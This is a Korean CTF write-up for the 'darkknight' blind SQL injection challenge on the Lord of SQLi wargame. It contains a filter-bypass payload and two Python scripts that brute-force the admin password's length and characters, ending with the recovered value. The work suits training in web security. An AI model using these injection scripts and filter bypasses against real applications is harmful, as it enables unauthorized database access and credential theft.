pw -> single quote 필터링
no -> prob, _, ., (), single quote, substr, ascii, = 필터링
대충 이런 식으로 익스하면 되겠다.
?pw=0&no=1 or id like "admin"%23
1. pw 길이 구하기
import requests
# Step 1: learn len(pw) one yes/no question at a time.
# `no` is spliced into the SQL text server-side; the blocklist noted above
# rejects single quotes, substr, ascii and "=", so the probe uses double
# quotes and `like` instead. A page body containing "Hello admin" is the
# oracle bit. A prepared statement with bound parameters would remove the
# injection point; a token blocklist like this one does not.
i = 0  # current length guess; stays bound to the answer after the loop
cookies = {"PHPSESSID": ""}  # cookie value is blank in the writeup as published
while True:
    url = (
        "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"
        f"?pw=0&no=1%20or%20id%20like%20%22admin%22%20and%20length(pw)%20like%20{i}%23"
    )
    res = requests.get(url, cookies=cookies)
    if "Hello admin" not in res.text:
        i += 1  # no match: try the next length (loop is unbounded, as originally)
        continue
    print('pw length : ', i)
    break
2. pw 하나하나 구하기
import requests
import threading
# Session cookie shared by every probe; its value is blank in the writeup.
cookies = dict(PHPSESSID="")
def func(i):
    """Recover the *i*-th character (1-based) of pw and print it.

    Each request asks whether right(left(pw, i), 1) matches char(c) for one
    candidate byte c in 0x30..0x7a; a body containing "Hello admin" is a yes.
    right(left()) stands in for the blocked substr(), char() for a quoted
    literal, and `like` for the blocked "=". Prints the first matching
    candidate and returns; prints nothing when no candidate matches.
    Runs on its own thread, so output from several positions may interleave.

    NOTE(review): under a case-insensitive column collation `like` would
    report the uppercase candidate (lower code point) before its lowercase
    twin — confirm against the value the writeup reports.
    """
    for candidate in range(48, 123):
        probe = (
            "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php"
            f"?pw=0&no=1%20or%20id%20like%20%22admin%22%20and%20right(left(pw,{i}),1)%20like%20char({candidate})%23"
        )
        body = requests.get(probe, cookies=cookies).text
        if "Hello admin" not in body:
            continue
        print('index:', i, ' char: ', chr(candidate))
        return
# Step 2 driver: one worker thread per password position; range(1, 9)
# presumably comes from the length found in step 1. The threads are
# non-daemon, so the interpreter waits for them even though nothing joins
# them explicitly; their prints can interleave.
for i in range(1, 9):
    thread = threading.Thread(target=func, kwargs={"i": i})
    thread.start()
0b70ea1f
https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw=0b70ea1f&no=1%20or%20id%20like%20%22admin%22%20%26%26%20pw%20like%20%220b70ea1f%22%23